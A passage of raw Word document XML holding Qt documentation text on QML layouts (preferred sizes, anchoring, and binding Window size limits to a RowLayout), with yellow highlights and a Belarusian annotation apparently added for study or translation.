      <w:hyperlink r:id="rId1719" w:anchor="preferredWidth-attached-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.preferredWidth</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1720" w:anchor="preferredHeight-attached-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.preferredHeight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Relying on the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1721" w:anchor="width-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>width</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1722" w:anchor="height-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>height</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">properties for </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>specifying the preferred size</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> might give </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>some unexpected behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, changing the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1723" w:anchor="width-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>width</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1724" w:anchor="height-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>height</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">properties won't trigger a layout rearrangement. Also, </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when the layout is forced to do a full rebuild it might use</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the actual width and height, and not the width and height specified in the QML file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1403" w:name="connecting-windows-and-layouts"/>
      <w:bookmarkStart w:id="1404" w:name="_Toc483000831"/>
      <w:bookmarkStart w:id="1405" w:name="_Toc483003824"/>
      <w:bookmarkStart w:id="1406" w:name="_Toc483604177"/>
      <w:bookmarkStart w:id="1407" w:name="_Toc483605397"/>
      <w:bookmarkEnd w:id="1403"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connecting windows and layouts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1404"/>
      <w:bookmarkEnd w:id="1405"/>
      <w:bookmarkEnd w:id="1406"/>
      <w:bookmarkEnd w:id="1407"/>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You can just use </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40BC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>normal anchoring concepts</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure that the layout will follow the window resizing.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RowLayout</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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 xml:space="preserve">    id</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layout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    anchors</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fill</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parent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40BC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>size constraints of layouts can be used to ensure that the window cannot be resized beyond the layout constraints</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. You can take the size constraints from the layout and set these constraints on the minimumWidth, minimumHeight, maximumWidth, and maximumHeight of the Window element. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40BC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>following code ensures that the window cannot be resized beyond the constraints of the layout</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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minimumWidth</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layout</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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minimumWidth</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minimumHeight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layout</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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minimumHeight</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maximumWidth</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w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>maximumHeight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layout</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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maximumHeight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="008F1DE7" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40BC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Since layout.Layout.maximumWidth is infinite in this case, we cannot bind that to the maximumWidth property of Window, since that is an integer number. We therefore set a fixed maximum width to 1000.</w:t>
      </w:r>
      <w:r w:rsidR="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="008F1DE7" w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>нюансы звязвання ўласцівасцяў</w:t>
      </w:r>
      <w:r w:rsidR="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40BC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you usually want</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the initial size of the window to be the layout's implicit size:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">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C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>width</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implicitWidth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00A40BC4" w:rsidRDefault="00C570D9" w:rsidP="00A40BC4">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>height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 xml:space="preserve"> layout</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>implicitHeight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00464480" w:rsidRDefault="00464480" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A40BC4" w:rsidRPr="00A40BC4" w:rsidRDefault="00A40BC4" w:rsidP="00A40BC4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
